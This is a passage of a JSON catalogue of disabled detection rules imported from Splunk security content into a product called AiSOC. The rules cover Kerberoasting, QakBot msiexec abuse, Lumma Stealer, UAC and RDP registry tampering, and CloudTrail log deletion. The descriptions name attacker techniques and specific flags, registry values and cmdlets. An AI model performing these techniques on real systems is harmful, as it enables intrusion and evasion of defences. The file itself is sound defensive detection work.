This flag is typically used to bypass the browser\u2019s built-in pop-up protections, allowing automatic execution of pop-ups or redirects without user interaction. While legitimate in some testing or automation scenarios, its presence on endpoints, particularly when combined with other automation or concealment flags, may indicate attempts by malicious actors to execute web-based content stealthily or evade user interaction controls, representing a potential security risk that warrants investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-process-launched-with-disable-popup-blocking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95f8acd6-978e-42d6-99c1-85baacdd2b46", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_process_launched_with_disable_popup_blocking.yml" } }, { "id": "splunk-security-content-9683271d-92e4-43b5-a907-1983bfb9f7fd", "type": "detection", "name": "Windows MsiExec HideWindow Rundll32 Execution", "description": "The following analytic detects the execution of the msiexec.exe process with the /HideWindow and rundll32 command-line parameters. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant because it is a known tactic used by malware like QakBot to mask malicious operations under legitimate system processes. 
If confirmed malicious, this behavior could allow an attacker to download additional payloads, execute malicious code, or establish communication with remote servers, thereby evading detection and maintaining persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-hidewindow-rundll32-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9683271d-92e4-43b5-a907-1983bfb9f7fd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml" } }, { "id": "splunk-security-content-96bce783-c22e-4e48-8cf1-3eb2794c5083", "type": "detection", "name": "Cisco Secure Firewall - Lumma Stealer Activity", "description": "This analytic detects Lumma Stealer activity using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where four of the following Snort signature IDs 64793, 64794, 64797, 64798, 64799, 64800, 64801, 62709, 64167, 64168, 64169, 64796, 62710, 62711, 62712, 62713, 62714, 62715, 62716, 62717, 64812, 64810, 64811 occur within a span of 15 minutes from the same host.\nIf confirmed malicious, this behavior is highly indicative of a successful Lumma Stealer infection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210", "T1027", "T1204" ], 
"log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-lumma-stealer-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "96bce783-c22e-4e48-8cf1-3eb2794c5083", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___lumma_stealer_activity.yml" } }, { "id": "splunk-security-content-970455a1-4ac2-47e1-a9a5-9e75443ddcb9", "type": "detection", "name": "Windows PowerView Kerberos Service Ticket Request", "description": "The following analytic detects the execution of the `Get-DomainSPNTicket` commandlet, part of the PowerView tool, by leveraging PowerShell Script Block Logging (EventCode=4104). This commandlet requests Kerberos service tickets for specified service principal names (SPNs). Monitoring this activity is crucial as it can indicate attempts to perform Kerberoasting, a technique used to extract SPN account passwords via cracking tools like hashcat. 
If confirmed malicious, this activity could allow attackers to gain unauthorized access to sensitive accounts, potentially leading to privilege escalation and further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-kerberos-service-ticket-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "970455a1-4ac2-47e1-a9a5-9e75443ddcb9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_kerberos_service_ticket_request.yml" } }, { "id": "splunk-security-content-9777e7e3-2499-4a16-a519-ebe33630c1e8", "type": "detection", "name": "Windows Symlink Evaluation Change via Fsutil", "description": "This analytic detects the execution of the Windows built-in tool Fsutil.exe with\nthe \"behavior\", \"set\" and \"SymlinkEvaluation\" parameters.\nAttackers can abuse this to alter symlink evaluation behavior on Windows, potentially enabling remote traversal over SMB shares or evading defenses.\nSuch changes should be uncommon or even rare in enterprise environments and should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/windows-symlink-evaluation-change-via-fsutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9777e7e3-2499-4a16-a519-ebe33630c1e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_symlink_evaluation_change_via_fsutil.yml" } }, { "id": "splunk-security-content-977b3082-5f3d-11ec-b954-acde48001122", "type": "detection", "name": "Linux At Allow Config File Creation", "description": "The following analytic detects the creation of the /etc/at.allow or /etc/at.deny configuration files in Linux. It leverages file creation events from the Endpoint datamodel to identify when these files are created. This activity is significant as these files control user permissions for the \"at\" scheduling application and can be abused by attackers to establish persistence. If confirmed malicious, this could allow unauthorized execution of malicious code, leading to potential data theft or further system compromise. 
Analysts should review the file path, creation time, and associated processes to assess the threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-at-allow-config-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "977b3082-5f3d-11ec-b954-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_at_allow_config_file_creation.yml" } }, { "id": "splunk-security-content-977da0c0-c7d5-45de-8b7e-f79e959ca13d", "type": "detection", "name": "Windows Product Key Registry Query", "description": "This analytic detects the execution of a process attempting to access the registry for product key recovery purposes.\nThis behavior could be significant as it might indicate potential malware activity, attempts to bypass security measures, or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-product-key-registry-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "977da0c0-c7d5-45de-8b7e-f79e959ca13d", "source_commit": "4d4c7ee", 
"license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_product_key_registry_query.yml" } }, { "id": "splunk-security-content-97937ece-cb13-4dbc-9684-c0dc3afd400a", "type": "detection", "name": "Windows Wmic Systeminfo Discovery", "description": "The following analytic detects the execution of Windows Management Instrumentation Command-line (WMIC) commands used for computer system discovery on a Windows system. Specifically, it monitors for commands such as \u201cwmic computersystem\u201d that retrieve detailed information about the computer\u2019s model, manufacturer, name, domain, and other system attributes. While these commands are commonly used by administrators for inventory and troubleshooting, they may also be exploited by adversaries to gain insight into the target environment during the reconnaissance phase of an attack. Identifying and alerting on WMIC computer system queries helps security teams recognize unauthorized information gathering and take steps to mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-systeminfo-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97937ece-cb13-4dbc-9684-c0dc3afd400a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_systeminfo_discovery.yml" } }, { "id": 
"splunk-security-content-97a8dc5f-8a7c-4fed-9e3e-ec407fd0268a", "type": "detection", "name": "Windows Computer Account Created by Computer Account", "description": "The following analytic identifies a computer account creating a new computer account with a specific Service Principal Name (SPN) \"RestrictedKrbHost\". This detection leverages Windows Security Event Logs, specifically EventCode 4741, to identify such activities. This behavior is significant as it may indicate an attempt to establish unauthorized Kerberos authentication channels, potentially leading to lateral movement or privilege escalation. If confirmed malicious, this activity could allow an attacker to impersonate services, access sensitive information, or maintain persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-computer-account-created-by-computer-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97a8dc5f-8a7c-4fed-9e3e-ec407fd0268a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_computer_account_created_by_computer_account.yml" } }, { "id": "splunk-security-content-97d85f98-9d15-41a0-8682-7030454875e7", "type": "detection", "name": "HTTP Possible Request Smuggling", "description": "HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. 
Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users. This detection identifies a common request smuggling technique of using both Content-Length and Transfer-Encoding headers to cause a parsing confusion between the frontend and backend.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-possible-request-smuggling.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97d85f98-9d15-41a0-8682-7030454875e7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_possible_request_smuggling.yml" } }, { "id": "splunk-security-content-97d9cfb2-61ad-11ec-bb2d-acde48001122", "type": "detection", "name": "Linux File Creation In Init Boot Directory", "description": "The following analytic detects the creation of files in Linux init boot directories, which are used for automatic execution upon system startup.\nIt leverages file system logs to identify new files in directories such as /etc/init.d/ and /etc/rc.d/. 
This activity is significant as it is a common persistence technique used by adversaries, malware authors, and red teamers.\nIf confirmed malicious, this could allow an attacker to maintain persistence on the compromised host, potentially leading to further exploitation and unauthorized control over the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1037.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-file-creation-in-init-boot-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97d9cfb2-61ad-11ec-bb2d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_file_creation_in_init_boot_directory.yml" } }, { "id": "splunk-security-content-97e2fe57-3740-402c-988a-76b64ce04b8d", "type": "detection", "name": "Okta MFA Exhaustion Hunt", "description": "The following analytic detects patterns of successful and failed Okta MFA push attempts to identify potential MFA exhaustion attacks. It leverages Okta event logs, specifically focusing on push verification events, and uses statistical evaluations to determine suspicious activity. This activity is significant as it may indicate an attacker attempting to bypass MFA by overwhelming the user with push notifications. 
If confirmed malicious, this could lead to unauthorized access, compromising the security of the affected accounts and potentially the entire environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-mfa-exhaustion-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97e2fe57-3740-402c-988a-76b64ce04b8d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_mfa_exhaustion_hunt.yml" } }, { "id": "splunk-security-content-97fc2b60-c8eb-4711-93f7-d26fade3686f", "type": "detection", "name": "Windows System Reboot CommandLine", "description": "The following analytic identifies the execution of the Windows command line to reboot a host machine using \"shutdown.exe\" with specific parameters. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it is often associated with advanced persistent threats (APTs) and remote access trojans (RATs) like dcrat, which may use system reboots to disrupt operations, aid in system destruction, or inhibit recovery. 
If confirmed malicious, this could lead to system downtime, data loss, or hindered incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-reboot-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "97fc2b60-c8eb-4711-93f7-d26fade3686f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_reboot_commandline.yml" } }, { "id": "splunk-security-content-983be012-e408-4cb0-b87f-6756bb5f7047", "type": "detection", "name": "Cisco Duo Bulk Policy Deletion", "description": "The following analytic detects instances where a Duo administrator performs a bulk deletion of more than three policies in a single action. It identifies this behavior by searching Duo activity logs for the policy_bulk_delete action, extracting the names of deleted policies, and counting them. If the count exceeds three, the event is flagged. This behavior is significant for a Security Operations Center (SOC) because mass deletion of security policies can indicate malicious activity, such as an attacker or rogue administrator attempting to weaken or disable security controls, potentially paving the way for further compromise. Detecting and investigating such actions promptly is critical, as the impact of this attack could include reduced security posture, increased risk of unauthorized access, and potential data breaches. 
Monitoring for bulk policy deletions helps ensure that any suspicious or unauthorized changes to security configurations are quickly identified and addressed to protect organizational assets and maintain compliance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-bulk-policy-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "983be012-e408-4cb0-b87f-6756bb5f7047", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_bulk_policy_deletion.yml" } }, { "id": "splunk-security-content-985f322c-57a5-11ec-b9ac-acde48001122", "type": "detection", "name": "MS Exchange Mailbox Replication service writing Active Server Pages", "description": "The following analytic identifies the creation of suspicious .aspx files in specific directories associated with Exchange exploitation by the HAFNIUM group and the ProxyShell vulnerability. It detects this activity by monitoring the MSExchangeMailboxReplication.exe process, which typically does not write .aspx files. This behavior is significant as it may indicate an active exploitation attempt on Exchange servers. If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, or maintain persistence within the environment. 
Immediate investigation and remediation are crucial to prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ms-exchange-mailbox-replication-service-writing-active-server-pages.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "985f322c-57a5-11ec-b9ac-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml" } }, { "id": "splunk-security-content-986565a2-7707-48ea-9590-37929cebc938", "type": "detection", "name": "ASL AWS Defense Evasion PutBucketLifecycle", "description": "The following analytic detects `PutBucketLifecycle` events in AWS CloudTrail logs where a user sets a lifecycle rule for an S3 bucket with an expiration period of fewer than three days. This detection leverages CloudTrail logs to identify suspicious lifecycle configurations. This activity is significant because attackers may use it to delete CloudTrail logs quickly, thereby evading detection and impairing forensic investigations. 
If confirmed malicious, this could allow attackers to cover their tracks, making it difficult to trace their actions and respond to the breach effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485.001", "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-putbucketlifecycle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "986565a2-7707-48ea-9590-37929cebc938", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_putbucketlifecycle.yml" } }, { "id": "splunk-security-content-989019b4-b7aa-418a-9a17-2293e91288b6", "type": "detection", "name": "Windows Modify Registry DisableSecuritySettings", "description": "The following analytic detects modifications to the Windows registry that disable security settings for Terminal Services. It leverages the Endpoint data model, specifically monitoring changes to the registry path associated with Terminal Services security settings. This activity is significant because altering these settings can weaken the security posture of Remote Desktop Services, potentially allowing unauthorized remote access. 
If confirmed malicious, such modifications could enable attackers to gain persistent remote access to the system, facilitating further exploitation and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disablesecuritysettings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "989019b4-b7aa-418a-9a17-2293e91288b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disablesecuritysettings.yml" } }, { "id": "splunk-security-content-98e6b389-2806-4426-a580-8a92cb0d9710", "type": "detection", "name": "Microsoft Intune Mobile Apps", "description": "Microsoft Intune supports deploying packaged applications for software distribution; this functionality can also be abused to deploy malicious payloads to Intune-managed devices.\nThis detection identifies when a packaged application has been added, updated, or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072", "T1021.007", "T1202", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-mobile-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "splunk/security_content", "source_id": "98e6b389-2806-4426-a580-8a92cb0d9710", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_mobile_apps.yml" } }, { "id": "splunk-security-content-98f22d82-9d62-11eb-9fcf-acde48001122", "type": "detection", "name": "Windows Multiple Disabled Users Failed To Authenticate Wth Kerberos", "description": "The following analytic detects a single source endpoint failing to authenticate with 30 unique disabled domain users using the Kerberos protocol within 5 minutes. It leverages Windows Security Event 4768, focusing on failure code `0x12`, indicating revoked credentials. This activity is significant as it may indicate a Password Spraying attack targeting disabled accounts, a tactic used by adversaries to gain initial access or elevate privileges. If confirmed malicious, this could lead to unauthorized access or privilege escalation within the Active Directory environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-disabled-users-failed-to-authenticate-wth-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "98f22d82-9d62-11eb-9fcf-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"detections/endpoint/windows_multiple_disabled_users_failed_to_authenticate_wth_kerberos.yml" } }, { "id": "splunk-security-content-98f6ad4f-4325-4096-9d69-45dc8e638e82", "type": "detection", "name": "Okta Successful Single Factor Authentication", "description": "The following analytic identifies successful single-factor authentication events against the Okta Dashboard for accounts without Multi-Factor Authentication (MFA) enabled. It detects this activity by analyzing Okta logs for successful authentication events where \"Okta Verify\" is not used. This behavior is significant as it may indicate a misconfiguration, policy violation, or potential account takeover. If confirmed malicious, an attacker could gain unauthorized access to the account, potentially leading to data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-successful-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "98f6ad4f-4325-4096-9d69-45dc8e638e82", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_successful_single_factor_authentication.yml" } }, { "id": "splunk-security-content-991eb510-0fc6-11ec-82d3-acde48001122", "type": "detection", "name": "SchCache Change By App Connect And Create ADSI Object", "description": "The following analytic detects an application attempting to connect and create an ADSI 
object to perform an LDAP query. It leverages Sysmon EventCode 11 to identify changes in the Active Directory Schema cache files located in %LOCALAPPDATA%\\Microsoft\\Windows\\SchCache or %systemroot%\\SchCache. This activity is significant as it can indicate the presence of suspicious applications, such as ransomware, using ADSI object APIs for LDAP queries. If confirmed malicious, this behavior could allow attackers to gather sensitive directory information, potentially leading to further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schcache-change-by-app-connect-and-create-adsi-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "991eb510-0fc6-11ec-82d3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schcache_change_by_app_connect_and_create_adsi_object.yml" } }, { "id": "splunk-security-content-9928b732-210e-11ec-b65e-acde48001122", "type": "detection", "name": "Disable UAC Remote Restriction", "description": "The following analytic detects the modification of the registry to disable UAC remote restriction by setting the \"LocalAccountTokenFilterPolicy\" value to \"0x00000001\". It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\CurrentVersion\\\\Policies\\\\System*\". 
This activity is significant because disabling UAC remote restriction can allow an attacker to bypass User Account Control (UAC) protections, potentially leading to privilege escalation. If confirmed malicious, this could enable an attacker to execute unauthorized actions with elevated privileges, compromising the security of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-uac-remote-restriction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9928b732-210e-11ec-b65e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_uac_remote_restriction.yml" } }, { "id": "splunk-security-content-993ce99d-9cdd-42c7-a2cf-733d5954e5a6", "type": "detection", "name": "Windows System File on Disk", "description": "The following analytic detects the creation of new .sys files on disk. It leverages the Endpoint.Filesystem data model to identify and log instances where .sys files are written to the filesystem. This activity is significant because .sys files are often used as kernel mode drivers, and their unauthorized creation can indicate malicious activity such as rootkit installation. 
If confirmed malicious, this could allow an attacker to gain kernel-level access, leading to full system compromise, persistent control, and the ability to bypass security mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-file-on-disk.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "993ce99d-9cdd-42c7-a2cf-733d5954e5a6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_file_on_disk.yml" } }, { "id": "splunk-security-content-99495452-b899-11eb-96dc-acde48001122", "type": "detection", "name": "Enable RDP In Other Port Number", "description": "The following analytic detects modifications to the registry that enable RDP on a machine using a non-default port number. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" and the \"PortNumber\" value. This activity is significant as attackers often modify RDP settings to facilitate lateral movement and maintain remote access to compromised systems. 
If confirmed malicious, this could allow attackers to bypass network defenses, gain persistent access, and potentially control the compromised machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/enable-rdp-in-other-port-number.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "99495452-b899-11eb-96dc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/enable_rdp_in_other_port_number.yml" } }, { "id": "splunk-security-content-99abf2e1-863c-4ec6-82f8-714391590a4c", "type": "detection", "name": "GitHub Enterprise Modify Audit Log Event Stream", "description": "The following analytic detects when a user modifies or disables audit log event streaming in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for configuration 